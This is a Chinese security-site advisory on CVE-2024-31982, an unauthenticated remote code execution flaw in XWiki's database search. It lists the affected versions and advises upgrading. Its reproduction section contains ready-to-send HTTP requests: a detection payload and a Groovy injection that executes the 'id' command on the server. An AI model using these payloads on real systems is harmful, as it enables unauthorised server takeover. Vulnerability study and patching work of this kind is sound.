XWiki 远程代码执行漏洞|CVE-2024-31982

admin 2025年3月24日14:13:35评论27 views字数 1488阅读4分57秒阅读模式

字数 350,阅读大约需 2 分钟

系统介绍

XWiki是一个开源的企业级Wiki系统,它不仅支持Wiki功能,还提供了构建协作式Web应用的能力。XWiki的开发平台特性允许创建协作式Web应用,同时也提供了构建于平台之上的打包应用(第二代wiki)。

漏洞概述

从版本2.4-milestone-1开始,在版本4.10.20、15.5.4   和15.10-rc-1之前,XWiki的数据库搜索允许通过搜索⽂本远程执⾏代码。这允许公共wiki的任何访问者或封闭wiki的⽤⼾远程执⾏代码,因为默认情况下所有⽤⼾都可以访问数据库搜索。该漏洞源于DatabaseSearch  接口代码设置不当缺陷,导致未经身份验证的远程攻击者可以执行任意Groovy代码或任意系统指令,从而获取服务器权限。

漏洞影响范围

从 2.4-milestone-1到14.10.20 之前的版本

从 15.0-rc-1 到 15.5.4 之前的版本

从 15.6-rc-1 到 15.10-rc-1 之前的版本

漏洞复现

检测POC

GET/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20(333%20%2B%20333))%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20%20HTTP/1.1HostUser-AgentMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36Accept-Encodinggzip, deflateAccept*/*Connectionkeep-alive
XWiki 远程代码执行漏洞|CVE-2024-31982

命令执行

GET/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Ddef%20command%20%3D%20%22id%22%3Bdef%20process%20%3D%20command.execute()%3Bprintln(%22Hello%20from%22%20%2B%20%22%20command%20output%3A%22%20%2B%20process.text.trim())%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7DHTTP/1.1HostUser-AgentMozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36Accept-Encodinggzip, deflateAccept*/*Connectionkeep-alive
XWiki 远程代码执行漏洞|CVE-2024-31982

修复建议

官方已发布新版本修复漏洞,建议尽快升级到最新版本:https://www.xwiki.org

原文始发于微信公众号(南街老友):XWiki 远程代码执行漏洞|CVE-2024-31982

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月24日14:13:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XWiki 远程代码执行漏洞|CVE-2024-31982https://cn-sec.com/archives/3876492.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息